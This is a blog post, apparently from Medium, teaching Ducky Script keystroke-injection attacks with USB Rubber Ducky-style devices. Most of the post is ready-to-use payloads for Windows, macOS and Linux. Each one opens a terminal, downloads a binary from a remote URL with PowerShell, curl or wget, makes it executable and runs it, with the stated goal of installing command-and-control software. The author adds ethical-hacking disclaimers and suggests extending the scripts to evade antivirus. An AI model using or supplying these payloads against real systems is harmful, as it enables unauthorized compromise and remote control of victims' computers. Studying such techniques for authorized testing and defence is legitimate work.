Understanding Ducky Script for Command and Control Software Implementation

Ronald Farrer
3 min readJun 26, 2023
Photo by Jason Richard on Unsplash

In the realm of hardware hacking, Ducky Script is a favorite tool among penetration testers and ethical hackers. Born from the ingenious design of the USB Rubber Ducky by Hak5, it’s a simple yet powerful scripting language designed for keystroke injection attacks. In this post, we will understand how to use Ducky Script to create a script that can download, install, and run Command and Control (C2) software (or pretty much anything) on Windows, macOS, and Linux systems.

Remember, we must first stress the importance of ethical hacking: this guide is meant for legitimate penetration testing and should only be used in environments where you have been given explicit permission to perform these activities.

Introduction to Ducky Script

Ducky Script leverages the fact that computers inherently trust human interface devices (like keyboards) without much scrutiny. The USB Rubber Ducky, and similar devices like the Flipper Zero, emulate a keyboard and send keystrokes incredibly quickly, executing commands before a user has time to react.

The beauty of Ducky Script lies in its simplicity. If you can operate a computer’s keyboard, you can script actions in Ducky Script. A Ducky Script simply imitates the sequence of keys a human would press to perform certain actions.

Ducky Script Examples

Below are examples of Ducky Script that download, install, and run a hypothetical C2 software from a public GitHub repository on Windows, macOS, and Linux. These examples assume that the repository contains pre-compiled binaries for each OS.

Please note: Using this to install actual malware on systems you don’t have permission to test is illegal and unethical.

Windows

DELAY 3000
REM Open a command prompt
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
REM Download and run the software
STRING powershell -Command "(New-Object Net.WebClient).DownloadFile('http://github.com/path/to/software.exe', 'C:\\Temp\\software.exe'); Start-Process 'C:\\Temp\\software.exe'"
ENTER

macOS

DELAY 3000
REM Open Terminal
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 1000
REM Download, install and run the software
STRING curl -L -o ~/Downloads/software http://github.com/path/to/software_macos
ENTER
DELAY 1000
STRING chmod +x ~/Downloads/software
ENTER
DELAY 500
STRING ~/Downloads/software
ENTER

Linux

DELAY 3000
REM Open Terminal
CTRL ALT t
DELAY 500
REM Download, install and run the software
STRING wget -P ~/Downloads/ http://github.com/path/to/software_linux
ENTER
DELAY 1000
STRING chmod +x ~/Downloads/software_linux
ENTER
DELAY 500
STRING ~/Downloads/software_linux
ENTER

Note: These scripts are very simple and would likely be detected by any modern antivirus. They’re meant to demonstrate the potential of Ducky Script and should be used as a starting point for creating more sophisticated scripts.

Conclusion

Ducky Script is a powerful tool for scripting tasks that are typically performed manually, and it has become an integral part of any penetration tester’s toolkit. However, with such power comes responsibility. It’s important to remember that these techniques should only be used ethically and legally. When used properly, Ducky Script can help identify and address security vulnerabilities, ensuring the ongoing protection of digital assets. Happy (ethical) hacking!

I Love Coffee! https://ko-fi.com/canutethegreat

--

--